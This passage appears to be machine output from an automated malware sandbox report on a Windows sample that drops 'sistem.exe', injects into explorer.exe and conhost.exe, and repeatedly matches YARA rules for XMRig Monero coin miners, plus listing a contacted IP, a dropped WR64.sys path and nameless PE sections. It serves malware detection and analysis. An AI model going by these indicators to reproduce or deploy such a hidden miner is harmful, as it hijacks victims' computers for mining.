                  Source: unknownTCP traffic detected without corresponding DNS query: 95.143.179.185
                  Source: AppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                  Source: AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                  Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  PE file has nameless sectionsShow sources
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: sistem.exe.1.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCE8
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCE1
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCF7
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCCE
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCCBF
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD6C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD4D
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD5C
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD34
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_3_026BCD1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 1_2_0564EC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569FA96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569B6F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569DFC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_0569DFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097FD2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F64F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F6E57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 9_2_097F6EA0
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CE2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CDF06
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CEB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CD2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000001B0F39CE70E
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA36265E22
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA36265076
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00007FFA3626044A
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218DF06
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218E2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218EB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218E70E
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00000201F218D2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36250330
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA362567BC
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36255E22
                  Source: C:\Windows\System32\conhost.exeCode function: 17_2_00007FFA36255076
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4E2D6
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4DF06
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4D2D2
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4E70E
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000224D5B4EB6A
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA362666FD
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36265E22
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36265076
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA3626044A
                  Source: C:\Windows\System32\conhost.exeCode function: 21_2_00007FFA36268BBE
                  Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
